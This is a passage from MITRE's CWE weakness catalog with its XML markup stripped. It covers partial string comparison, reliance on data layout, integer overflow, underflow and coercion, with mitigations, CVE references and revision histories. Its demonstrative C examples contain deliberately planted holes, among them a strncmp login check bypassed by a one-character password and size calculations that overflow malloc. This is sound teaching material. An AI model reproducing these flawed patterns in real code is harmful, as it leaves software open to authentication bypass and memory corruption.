confidence level is achieved, a regular expression may not be foolproof. If an exploit is allowed to slip through, then record the exploit and refactor your regular expression. + + + + + CVE-2005-1604 + MIE. ".php.ns" bypasses ".php$" regexp but is still parsed as PHP by Apache. (manipulates an equivalence property under Apache) + https://www.cve.org/CVERecord?id=CVE-2005-1604 + + + + + Overly Restrictive Regular Expression + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + Can overlap allowlist/denylist errors (CWE-183/CWE-184) + + + + PLOVER + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Potential_Mitigations, Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Relationships, Relationship_Notes, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Relationships + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Applicable_Platforms + + + CWE Content Team + MITRE + 2019-01-03 + updated Description + + + CWE Content Team + MITRE + 2020-02-24 + updated Description, Relationships + + + CWE Content Team + MITRE + 2020-06-25 + updated Relationship_Notes + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + The product performs a comparison that only examines a portion of a factor before determining whether there is a match, such as a substring, leading to resultant weaknesses. + For example, an attacker might succeed in authentication by providing a small password that matches the associated portion of the larger, correct password. + + + + + + Primary + + + + + + + + Implementation + + + + + Integrity + Access Control + Alter Execution Logic + Bypass Protection Mechanism + + + + + Testing + Thoroughly test the comparison scheme before deploying code into production. Perform positive testing as well as negative testing. + + + + + This example defines a fixed username and password. The AuthenticateUser() function is intended to accept a username and a password from an untrusted user, and check to ensure that it matches the username and password. If the username and password match, AuthenticateUser() is intended to indicate that authentication succeeded. + + + + /* Ignore CWE-259 (hard-coded password) and CWE-309 (use of password system for authentication) for this example. */ + + char *username = "admin";char *pass = "password"; + int AuthenticateUser(char *inUser, char *inPass) {if (strncmp(username, inUser, strlen(inUser))) {logEvent("Auth failure of username using strlen of inUser");return(AUTH_FAIL);}if (! strncmp(pass, inPass, strlen(inPass))) {logEvent("Auth success of password using strlen of inUser");return(AUTH_SUCCESS);}else {logEvent("Auth fail of password using sizeof");return(AUTH_FAIL);}} + int main (int argc, char **argv) { + int authResult; + if (argc < 3) {ExitError("Usage: Provide a username and password");}authResult = AuthenticateUser(argv[1], argv[2]);if (authResult == AUTH_SUCCESS) {DoAuthenticatedTask(argv[1]);}else {ExitError("Authentication failed");} + } + + In AuthenticateUser(), the strncmp() call uses the string length of an attacker-provided inPass parameter in order to determine how many characters to check in the password. So, if the attacker only provides a password of length 1, the check will only examine the first byte of the application's password before determining success. + As a result, this partial comparison leads to improper authentication (CWE-287). + Any of these passwords would still cause authentication to succeed for the "admin" user: + + ppapaspass + + This significantly reduces the search space for an attacker, making brute force attacks more feasible. + The same problem also applies to the username, so values such as "a" and "adm" will succeed for the username. + While this demonstrative example may not seem realistic, see the Observed Examples for CVE entries that effectively reflect this same weakness. + + + + + CVE-2014-6394 + Product does not prevent access to restricted directories due to partial string comparison with a public directory + https://www.cve.org/CVERecord?id=CVE-2014-6394 + + + CVE-2004-1012 + Argument parser of an IMAP server treats a partial command "body[p" as if it is "body.peek", leading to index error and out-of-bounds corruption. + https://www.cve.org/CVERecord?id=CVE-2004-1012 + + + CVE-2004-0765 + Web browser only checks the hostname portion of a certificate when the hostname portion of the URI is not a fully qualified domain name (FQDN), which allows remote attackers to spoof trusted certificates. + https://www.cve.org/CVERecord?id=CVE-2004-0765 + + + CVE-2002-1374 + One-character password by attacker checks only against first character of real password. + https://www.cve.org/CVERecord?id=CVE-2002-1374 + + + CVE-2000-0979 + One-character password by attacker checks only against first character of real password. + https://www.cve.org/CVERecord?id=CVE-2000-0979 + + + + + Partial Comparison + + + + Allowed + This CWE entry is at the Variant level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + This is conceptually similar to other weaknesses, such as insufficient verification and regular expression errors. It is primary to some weaknesses. + + + + PLOVER + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Potential_Mitigations, Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Description, Relationships, Other_Notes, Taxonomy_Mappings, Weakness_Ordinalities + + + CWE Content Team + MITRE + 2009-12-28 + updated Demonstrative_Examples, Observed_Examples, Other_Notes, Relationship_Notes + + + CWE Content Team + MITRE + 2011-03-29 + updated Relationships + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences, Demonstrative_Examples + + + CWE Content Team + MITRE + 2011-06-27 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Relationships + + + CWE Content Team + MITRE + 2012-10-30 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2014-07-30 + updated Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Applicable_Platforms + + + CWE Content Team + MITRE + 2018-03-27 + updated Name, Observed_Examples, Relationships, Type + + + CWE Content Team + MITRE + 2019-01-03 + updated Relationships + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Partial Comparison + + + + The product makes invalid assumptions about how protocol data or memory is organized at a lower level, resulting in unintended program behavior. + + When changing platforms or protocol versions, in-memory organization of data may change in unintended ways. For example, some architectures may place local variables A and B right next to each other with A on top; some may place them next to each other with B on top; and others may add some padding to each. The padding size may vary to ensure that each variable is aligned to a proper word size. + In protocol implementations, it is common to calculate an offset relative to another field to pick out a specific piece of data. Exceptional conditions, often involving new protocol versions, may add corner cases that change the data layout in an unusual way. The result can be that an implementation accesses an unintended field in the packet, treating data of one type as data of another type. + + + + + + + + + + + + Implementation + + + Low + + + Integrity + Confidentiality + Modify Memory + Read Memory + Can result in unintended modifications or exposure of sensitive memory. + + + + + Fuzzing + Fuzz testing (fuzzing) is a powerful technique for generating large numbers of diverse inputs - either randomly or algorithmically - and dynamically invoking the code with those inputs. Even with random inputs, it is often capable of generating unexpected results such as crashes, memory corruption, or resource consumption. Fuzzing effectively produces repeatable test cases that clearly indicate bugs, which helps developers to diagnose the issues. + High + + + + + Implementation + Architecture and Design + In flat address space situations, never allow computing memory addresses as offsets from another memory address. + + + Architecture and Design + Fully specify protocol layout unambiguously, providing a structured grammar (e.g., a compilable yacc grammar). + + + Testing + Testing: Test that the implementation properly handles each case in the protocol grammar. + + + + + In this example function, the memory address of variable b is derived by adding 1 to the address of variable a. This derived address is then used to assign the value 0 to b. + + void example() {char a;char b;*(&a + 1) = 0;} + + Here, b may not be one byte past a. It may be one byte in front of a. Or, they may have three bytes between them because they are aligned on 32-bit boundaries. + + + + + Reliance on data layout + + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + CLASP + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Time_of_Introduction + + + CWE Content Team + MITRE + 2008-09-08 + updated Applicable_Platforms, Common_Consequences, Relationships, Other_Notes, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2009-03-10 + updated Relationships + + + CWE Content Team + MITRE + 2009-10-29 + updated Common_Consequences + + + CWE Content Team + MITRE + 2011-03-29 + updated Common_Consequences + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated References, Relationships + + + CWE Content Team + MITRE + 2012-10-30 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2014-06-23 + updated Description, Other_Notes + + + CWE Content Team + MITRE + 2014-07-30 + updated Demonstrative_Examples, Relationships + + + CWE Content Team + MITRE + 2019-01-03 + updated Description, Relationships + + + CWE Content Team + MITRE + 2021-03-15 + updated References + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated Detection_Factors, Relationships, Time_of_Introduction + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Reliance on Data Layout + + + + The product performs a calculation that can produce an integer overflow or wraparound, when the logic assumes that the resulting value will always be larger than the original value. This can introduce other weaknesses when the calculation is used for resource management or execution control. + An integer overflow or wraparound occurs when an integer value is incremented to a value that is too large to store in the associated representation. When this occurs, the value may wrap to become a very small or negative number. While this may be intended behavior in circumstances that rely on wrapping, it can have security consequences if the wrap is unexpected. This is especially the case if the integer overflow can be triggered using user-supplied inputs. This becomes security-critical when the result is used to control looping, make a security decision, or determine the offset or size in behaviors such as memory allocation, copying, concatenation, etc. + + + + + + + + + + + + Implementation + + + Medium + + + Availability + DoS: Crash, Exit, or Restart + DoS: Resource Consumption (CPU) + DoS: Resource Consumption (Memory) + DoS: Instability + This weakness will generally lead to undefined behavior and therefore crashes. In the case of overflows involving loop index variables, the likelihood of infinite loops is also high. + + + Integrity + Modify Memory + If the value in question is important to data (as opposed to flow), simple data corruption has occurred. Also, if the wrap around results in other conditions such as buffer overflows, further memory corruption may occur. + + + Confidentiality + Availability + Access Control + Execute Unauthorized Code or Commands + Bypass Protection Mechanism + This weakness can sometimes trigger buffer overflows which can be used to execute arbitrary code. This is usually outside the scope of a program's implicit security policy. + + + + + Automated Static Analysis + This weakness can often be detected using automated static analysis tools. Many modern tools use data flow analysis or constraint-based techniques to minimize the number of false positives. + High + + + Black Box + Sometimes, evidence of this weakness can be detected using dynamic tools and techniques that interact with the product using large test suites with many diverse inputs, such as fuzz testing (fuzzing), robustness testing, and fault injection. The product's operation may slow down, but it should not become unstable, crash, or generate incorrect results. + Moderate + Without visibility into the code, black box methods may not be able to sufficiently distinguish this weakness from others, requiring follow-up manual methods to diagnose the underlying problem. + + + Manual Analysis + + This weakness can be detected using tools and techniques that require manual (human) analysis, such as penetration testing, threat modeling, and interactive tools that allow the tester to record and modify an active session. + Specifically, manual static analysis is useful for evaluating the correctness of allocation calculations. This can be useful for detecting overflow conditions (CWE-190) or similar weaknesses that might have serious security impacts on the program. + + High + These may be more effective than strictly automated techniques. This is especially the case with weaknesses that are related to design and business rules. + + + Automated Static Analysis - Binary or Bytecode + + According to SOAR, the following detection techniques may be useful: + + Highly cost effective: + + Bytecode Weakness Analysis - including disassembler + source code weakness analysis + Binary Weakness Analysis - including disassembler + source code weakness analysis + + + + High + + + Dynamic Analysis with Manual Results Interpretation + + According to SOAR, the following detection techniques may be useful: + + Cost effective for partial coverage: + + Fuzz Tester + Framework-based Fuzzer + + + + SOAR Partial + + + Manual Static Analysis - Source Code + + According to SOAR, the following detection techniques may be useful: + + Cost effective for partial coverage: + + Manual Source Code Review (not inspections) + + + + SOAR Partial + + + Automated Static Analysis - Source Code + + According to SOAR, the following detection techniques may be useful: + + Highly cost effective: + + Source code Weakness Analyzer + Context-configured Source Code Weakness Analyzer + + + + High + + + Architecture or Design Review + + According to SOAR, the following detection techniques may be useful: + + Highly cost effective: + + Formal Methods / Correct-By-Construction + + Cost effective for partial coverage: + + Inspection (IEEE 1028 standard) (can apply to requirements, design, source code, etc.) + + + + High + + + + + Requirements + Ensure that all protocols are strictly defined, such that all out-of-bounds behavior can be identified simply, and require strict conformance to the protocol. + + + Requirements + Language Selection + + Use a language that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid. + If possible, choose a language or compiler that performs automatic bounds checking. + + + + Architecture and Design + Libraries or Frameworks + + Use a vetted library or framework that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid. + Use libraries or frameworks that make it easier to handle numbers without unexpected consequences. + Examples include safe integer handling packages such as SafeInt (C++) or IntegerLib (C or C++). [REF-106] + + + + Implementation + Input Validation + + Perform input validation on any numeric input by ensuring that it is within the expected range. Enforce that the input meets both the minimum and maximum requirements for the expected range. + Use unsigned integers where possible. This makes it easier to perform validation for integer overflows. When signed integers are required, ensure that the range check includes minimum values as well as maximum values. + + + + Implementation + + Understand the programming language's underlying representation and how it interacts with numeric calculation (CWE-681). Pay close attention to byte size discrepancies, precision, signed/unsigned distinctions, truncation, conversion and casting between types, "not-a-number" calculations, and how the language handles numbers that are too large or too small for its underlying representation. [REF-7] + Also be careful to account for 32-bit, 64-bit, and other potential differences that may affect the numeric representation. + + + + Architecture and Design + For any security checks that are performed on the client side, ensure that these checks are duplicated on the server side, in order to avoid CWE-602. Attackers can bypass the client-side checks by modifying values after the checks have been performed, or by changing the client to remove the client-side checks entirely. Then, these modified values would be submitted to the server. + + + Implementation + Compilation or Build Hardening + Examine compiler warnings closely and eliminate problems with potential security implications, such as signed / unsigned mismatch in memory operations, or use of uninitialized variables. Even if the weakness is rarely exploitable, a single failure may lead to the compromise of the entire system. + + + + + The following image processing code allocates a table for images. + + img_t table_ptr; /*struct containing img data, 10kB each*/int num_imgs;...num_imgs = get_num_imgs();table_ptr = (img_t*)malloc(sizeof(img_t)*num_imgs);... + + This code intends to allocate a table of size num_imgs, however as num_imgs grows large, the calculation determining the size of the list will eventually overflow (CWE-190). This will result in a very small list to be allocated instead. If the subsequent code operates on the list as if it were num_imgs long, it may result in many types of out-of-bounds problems (CWE-119). + + + The following code excerpt from OpenSSH 3.3 demonstrates a classic case of integer overflow: + + nresp = packet_get_int();if (nresp > 0) {response = xmalloc(nresp*sizeof(char*));for (i = 0; i < nresp; i++) response[i] = packet_get_string(NULL);} + + If nresp has the value 1073741824 and sizeof(char*) has its typical value of 4, then the result of the operation nresp*sizeof(char*) overflows, and the argument to xmalloc() will be 0. Most malloc() implementations will happily allocate a 0-byte buffer, causing the subsequent loop iterations to overflow the heap buffer response. + + + Integer overflows can be complicated and difficult to detect. The following example is an attempt to show how an integer overflow may lead to undefined looping behavior: + + short int bytesRec = 0;char buf[SOMEBIGNUM]; + while(bytesRec < MAXGET) {bytesRec += getFromInput(buf+bytesRec);} + + In the above case, it is entirely possible that bytesRec may overflow, continuously creating a lower number than MAXGET and also overwriting the first MAXGET-1 bytes of buf. + + + In this example the method determineFirstQuarterRevenue is used to determine the first quarter revenue for an accounting/business application. The method retrieves the monthly sales totals for the first three months of the year, calculates the first quarter sales totals from the monthly sales totals, calculates the first quarter revenue based on the first quarter sales, and finally saves the first quarter revenue results to the database. + + #define JAN 1#define FEB 2#define MAR 3 + short getMonthlySales(int month) {...} + float calculateRevenueForQuarter(short quarterSold) {...} + int determineFirstQuarterRevenue() { + + + // Variable for sales revenue for the quarter + float quarterRevenue = 0.0f; + short JanSold = getMonthlySales(JAN); /* Get sales in January */short FebSold = getMonthlySales(FEB); /* Get sales in February */short MarSold = getMonthlySales(MAR); /* Get sales in March */ + + // Calculate quarterly total + short quarterSold = JanSold + FebSold + MarSold; + + // Calculate the total revenue for the quarter + quarterRevenue = calculateRevenueForQuarter(quarterSold); + saveFirstQuarterRevenue(quarterRevenue); + return 0; + } + + However, in this example the primitive type short int is used for both the monthly and the quarterly sales variables. In C the short int primitive type has a maximum value of 32768. This creates a potential integer overflow if the value for the three monthly sales adds up to more than the maximum value for the short int primitive type. An integer overflow can lead to data corruption, unexpected behavior, infinite loops and system crashes. To correct the situation the appropriate primitive type should be used, as in the example below, and/or provide some validation mechanism to ensure that the maximum value for the primitive type is not exceeded. + + ...float calculateRevenueForQuarter(long quarterSold) {...} + int determineFirstQuarterRevenue() { + ... + // Calculate quarterly total + long quarterSold = JanSold + FebSold + MarSold; + + // Calculate the total revenue for the quarter + quarterRevenue = calculateRevenueForQuarter(quarterSold); + ... + } + + Note that an integer overflow could also occur if the quarterSold variable has a primitive type long but the method calculateRevenueForQuarter has a parameter of type short. + + + + + CVE-2022-21668 + Chain: Python library does not limit the resources used to process images that specify a very large number of bands (CWE-1284), leading to excessive memory consumption (CWE-789) or an integer overflow (CWE-190). + https://www.cve.org/CVERecord?id=CVE-2022-21668 + + + CVE-2021-30860 + Chain: improper input validation (CWE-20) leads to integer overflow (CWE-190) in mobile OS, as exploited in the wild per CISA KEV. + https://www.cve.org/CVERecord?id=CVE-2021-30860 + + + CVE-2021-30663 + Chain: improper input validation (CWE-20) leads to integer overflow (CWE-190) in mobile OS, as exploited in the wild per CISA KEV. + https://www.cve.org/CVERecord?id=CVE-2021-30663 + + + CVE-2018-10887 + Chain: unexpected sign extension (CWE-194) leads to integer overflow (CWE-190), causing an out-of-bounds read (CWE-125) + https://www.cve.org/CVERecord?id=CVE-2018-10887 + + + CVE-2019-1010006 + Chain: compiler optimization (CWE-733) removes or modifies code used to detect integer overflow (CWE-190), allowing out-of-bounds write (CWE-787). + https://www.cve.org/CVERecord?id=CVE-2019-1010006 + + + CVE-2010-2753 + Chain: integer overflow leads to use-after-free + https://www.cve.org/CVERecord?id=CVE-2010-2753 + + + CVE-2005-1513 + Chain: integer overflow in securely-coded mail program leads to buffer overflow. In 2005, this was regarded as unrealistic to exploit, but in 2020, it was rediscovered to be easier to exploit due to evolutions of the technology. + https://www.cve.org/CVERecord?id=CVE-2005-1513 + + + CVE-2002-0391 + Integer overflow via a large number of arguments. + https://www.cve.org/CVERecord?id=CVE-2002-0391 + + + CVE-2002-0639 + Integer overflow in OpenSSH as listed in the demonstrative examples. + https://www.cve.org/CVERecord?id=CVE-2002-0639 + + + CVE-2005-1141 + Image with large width and height leads to integer overflow. + https://www.cve.org/CVERecord?id=CVE-2005-1141 + + + CVE-2005-0102 + Length value of -1 leads to allocation of 0 bytes and resultant heap overflow. + https://www.cve.org/CVERecord?id=CVE-2005-0102 + + + CVE-2004-2013 + Length value of -1 leads to allocation of 0 bytes and resultant heap overflow. + https://www.cve.org/CVERecord?id=CVE-2004-2013 + + + CVE-2017-1000121 + chain: unchecked message size metadata allows integer overflow (CWE-190) leading to buffer overflow (CWE-119). + https://www.cve.org/CVERecord?id=CVE-2017-1000121 + + + CVE-2013-1591 + Chain: an integer overflow (CWE-190) in the image size calculation causes an infinite loop (CWE-835) which sequentially allocates buffers without limits (CWE-1325) until the stack is full. + https://www.cve.org/CVERecord?id=CVE-2013-1591 + + + + Number Processing + Memory Management + Counters + + + + Integer overflow (wrap or wraparound) + + + Integer Overflow + + + Integer overflow + + + INT18-C + Evaluate integer expressions in a larger size before comparing or assigning to that size + CWE More Abstract + + + INT30-C + Ensure that unsigned integer operations do not wrap + CWE More Abstract + + + INT32-C + Ensure that operations on signed integers do not result in overflow + Imprecise + + + INT35-C + Evaluate integer expressions in a larger size before comparing or assigning to that size + + + MEM07-C + Ensure that the arguments to calloc(), when multiplied, do not wrap + CWE More Abstract + + + MEM35-C + Allocate sufficient memory for an object + + + 3 + Integer Overflows + + + SFP1 + Glitch in computation + + + Part 3-3 + Req SR 3.5 + + + Part 3-3 + Req SR 7.2 + + + Part 4-1 + Req SR-2 + + + Part 4-1 + Req SI-2 + + + Part 4-1 + Req SVV-1 + + + Part 4-1 + Req SVV-3 + + + Part 4-2 + Req CR 3.5 + + + Part 4-2 + Req CR 7.2 + + + + + + + + + + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + Integer overflows can be primary to buffer overflows. + "Integer overflow" is sometimes used to cover several types of errors, including signedness errors, or buffer overflows that involve manipulation of integer data types instead of characters. Part of the confusion results from the fact that 0xffffffff is -1 in a signed context. Other confusion also arises because of the role that integer overflows have in chains. + + + + PLOVER + 2006-07-19 + Draft 3 + 2006-07-19 + + + CWE Content Team + MITRE + 2008-09-08 + updated Common_Consequences, Relationships, Relationship_Notes, Taxonomy_Mappings, Terminology_Notes + + + CWE Content Team + MITRE + 2008-10-14 + updated Common_Consequences, Description, Potential_Mitigations, Terminology_Notes + + + CWE Content Team + MITRE + 2008-11-24 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2009-01-12 + updated Description, Name + + + CWE Content Team + MITRE + 2009-05-27 + updated Demonstrative_Examples + + + CWE Content Team + MITRE + 2009-10-29 + updated Relationships + + + CWE Content Team + MITRE + 2010-02-16 + updated Applicable_Platforms, Detection_Factors, Functional_Areas, Observed_Examples, Potential_Mitigations, References, Related_Attack_Patterns, Relationships, Taxonomy_Mappings, Terminology_Notes + + + CWE Content Team + MITRE + 2010-04-05 + updated Demonstrative_Examples, Detection_Factors, Potential_Mitigations, References, Related_Attack_Patterns + + + CWE Content Team + MITRE + 2010-06-21 + updated Common_Consequences, Potential_Mitigations, References + + + CWE Content Team + MITRE + 2010-09-27 + updated Observed_Examples, Potential_Mitigations + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2011-06-27 + updated Relationships + + + CWE Content Team + MITRE + 2011-09-13 + updated Potential_Mitigations, References, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2012-05-11 + updated Common_Consequences, Demonstrative_Examples, References, Relationships + + + CWE Content Team + MITRE + 2012-10-30 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2013-07-17 + updated References + + + CWE Content Team + MITRE + 2014-07-30 + updated Detection_Factors, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2015-12-07 + updated Relationships + + + CWE Content Team + MITRE + 2017-01-19 + updated Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Functional_Areas, Observed_Examples, References, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2018-03-27 + updated References + + + CWE Content Team + MITRE + 2019-01-03 + updated Relationships + + + CWE Content Team + MITRE + 2019-09-19 + updated Relationships + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2020-06-25 + updated Observed_Examples + + + CWE Content Team + MITRE + 2020-08-20 + updated Relationships + + + CWE Content Team + MITRE + 2020-12-10 + updated Observed_Examples + + + CWE Content Team + MITRE + 2021-03-15 + updated Potential_Mitigations + + + CWE Content Team + MITRE + 2021-07-20 + updated Relationships + + + CWE Content Team + MITRE + 2022-06-28 + updated Observed_Examples, Relationships + + + CWE Content Team + MITRE + 2022-10-13 + updated Observed_Examples + + + CWE Content Team + MITRE + 2023-01-31 + updated Description, Detection_Factors + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes, Relationships + + + "Mapping CWE to 62443" Sub-Working Group + CWE-CAPEC ICS/OT SIG + 2023-04-25 + Suggested mappings to ISA/IEC 62443. + + Integer Overflow (Wrap or Wraparound) + + + + The product subtracts one value from another, such that the result is less than the minimum allowable integer value, which produces a value that is not equal to the correct result. + This can happen in signed and unsigned cases. + + + + + + + + + + + + + Integer underflow + + "Integer underflow" is sometimes used to identify signedness errors in which an originally positive number becomes negative as a result of subtraction. However, there are cases of bad subtraction in which unsigned integers are involved, so it's not always a signedness issue. + "Integer underflow" is occasionally used to describe array index errors in which the index is negative. + + + + + + Implementation + + + + + Availability + DoS: Crash, Exit, or Restart + DoS: Resource Consumption (CPU) + DoS: Resource Consumption (Memory) + DoS: Instability + This weakness will generally lead to undefined behavior and therefore crashes. In the case of overflows involving loop index variables, the likelihood of infinite loops is also high. + + + Integrity + Modify Memory + If the value in question is important to data (as opposed to flow), simple data corruption has occurred. Also, if the wrap around results in other conditions such as buffer overflows, further memory corruption may occur. + + + Confidentiality + Availability + Access Control + Execute Unauthorized Code or Commands + Bypass Protection Mechanism + This weakness can sometimes trigger buffer overflows which can be used to execute arbitrary code. This is usually outside the scope of a program's implicit security policy. + + + + + Automated Static Analysis + Automated static analysis, commonly referred to as Static Application Security Testing (SAST), can find some instances of this weakness by analyzing source code (or binary/compiled code) without having to execute it. Typically, this is done by building a model of data flow and control flow, then searching for potentially-vulnerable patterns that connect "sources" (origins of input) with "sinks" (destinations where the data interacts with external components, a lower layer such as the OS, etc.) + High + + + + + The following example subtracts from a 32 bit signed integer. + + #include <stdio.h>#include <stdbool.h>main (void){int i;i = -2147483648;i = i - 1;return 0;} + + + The example has an integer underflow. The value of i is already at the lowest negative value possible, so after subtracting 1, the new value of i is 2147483647. + + + This code performs a stack allocation based on a length calculation. + + + int a = 5, b = 6; + size_t len = a - b; + char buf[len]; // Just blows up the stack + + } + + Since a and b are declared as signed ints, the "a - b" subtraction gives a negative result (-1). However, since len is declared to be unsigned, len is cast to an extremely large positive number (on 32-bit systems - 4294967295). As a result, the buffer buf[len] declaration uses an extremely large size to allocate on the stack, very likely more than the entire computer's memory space. + Miscalculations usually will not be so obvious. The calculation will either be complicated or the result of an attacker's input to attain the negative value. + + + + + CVE-2004-0816 + Integer underflow in firewall via malformed packet. + https://www.cve.org/CVERecord?id=CVE-2004-0816 + + + CVE-2004-1002 + Integer underflow by packet with invalid length. + https://www.cve.org/CVERecord?id=CVE-2004-1002 + + + CVE-2005-0199 + Long input causes incorrect length calculation. + https://www.cve.org/CVERecord?id=CVE-2005-0199 + + + CVE-2005-1891 + Malformed icon causes integer underflow in loop counter variable. + https://www.cve.org/CVERecord?id=CVE-2005-1891 + + + + + Integer underflow (wrap or wraparound) + + + SFP1 + Glitch in computation + + + INT30-C + Ensure that unsigned integer operations do not wrap + Imprecise + + + INT32-C + Ensure that operations on signed integers do not result in overflow + Imprecise + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + PLOVER + 2006-07-19 + Draft 3 + 2006-07-19 + + + Eric Dalci + Cigital + 2008-07-01 + updated Demonstrative_Example + + + CWE Content Team + MITRE + 2008-09-08 + updated Alternate_Terms, Applicable_Platforms, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2008-10-14 + updated Description + + + CWE Content Team + MITRE + 2009-05-27 + updated Demonstrative_Examples + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences + + + CWE Content Team + MITRE + 2011-06-27 + updated Common_Consequences + + + CWE Content Team + MITRE + 2012-05-11 + updated Common_Consequences, References, Relationships + + + CWE Content Team + MITRE + 2014-07-30 + updated Demonstrative_Examples, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2015-12-07 + updated Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Taxonomy_Mappings + + + CWE Content Team + MITRE + 2019-01-03 + updated Relationships + + + CWE Content Team + MITRE + 2020-02-24 + updated Relationships + + + CWE Content Team + MITRE + 2021-03-15 + updated Demonstrative_Examples + + + CWE Content Team + MITRE + 2022-04-28 + updated Research_Gaps + + + CWE Content Team + MITRE + 2023-04-27 + updated Detection_Factors, Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + Integer coercion refers to a set of flaws pertaining to the type casting, extension, or truncation of primitive data types. + Several flaws fall under the category of integer coercion errors. For the most part, these errors in and of themselves result only in availability and data integrity issues. However, in some circumstances, they may result in other, more complicated security related flaws, such as buffer overflow conditions. + + + + + + + + + + + + Implementation + + + Medium + + + Availability + DoS: Resource Consumption (CPU) + DoS: Resource Consumption (Memory) + DoS: Crash, Exit, or Restart + Integer coercion often leads to undefined states of execution resulting in infinite loops or crashes. + + + Integrity + Confidentiality + Availability + Execute Unauthorized Code or Commands + In some cases, integer coercion errors can lead to exploitable buffer overflow conditions, resulting in the execution of arbitrary code. + + + Integrity + Other + Other + Integer coercion errors result in an incorrect value being stored for the variable in question. + + + + + Automated Static Analysis + Automated static analysis, commonly referred to as Static Application Security Testing (SAST), can find some instances of this weakness by analyzing source code (or binary/compiled code) without having to execute it. Typically, this is done by building a model of data flow and control flow, then searching for potentially-vulnerable patterns that connect "sources" (origins of input) with "sinks" (destinations where the data interacts with external components, a lower layer such as the OS, etc.) + High + + + + + Requirements + A language which throws exceptions on ambiguous data casts might be chosen. + + + Architecture and Design + Design objects and program flow such that multiple or complex casts are unnecessary + + + Implementation + Ensure that any data type casting that you must used is entirely understood in order to reduce the plausibility of error in use. + + + + + The following code is intended to read an incoming packet from a socket and extract one or more headers. + + DataPacket *packet;int numHeaders;PacketHeader *headers; + sock=AcceptSocketConnection();ReadPacket(packet, sock);numHeaders =packet->headers; + if (numHeaders > 100) {ExitError("too many headers!");}headers = malloc(numHeaders * sizeof(PacketHeader);ParsePacketHeaders(packet, headers); + + The code performs a check to make sure that the packet does not contain too many headers. However, numHeaders is defined as a signed int, so it could be negative. If the incoming packet specifies a value such as -3, then the malloc calculation will generate a negative number (say, -300 if each header can be a maximum of 100 bytes). When this result is provided to malloc(), it is first converted to a size_t type. This conversion then produces a large value such as 4294966996, which may cause malloc() to fail or to allocate an extremely large amount of memory (CWE-195). With the appropriate negative numbers, an attacker could trick malloc() into using a very small positive number, which then allocates a buffer that is much smaller than expected, potentially leading to a buffer overflow. + + + The following code reads a maximum size and performs validation on that size. It then performs a strncpy, assuming it will not exceed the boundaries of the array. While the use of "short s" is forced in this particular example, short int's are frequently used within real-world code, such as code that processes structured data. + + int GetUntrustedInt () {return(0x0000FFFF);} + void main (int argc, char **argv) { + char path[256];char *input;int i;short 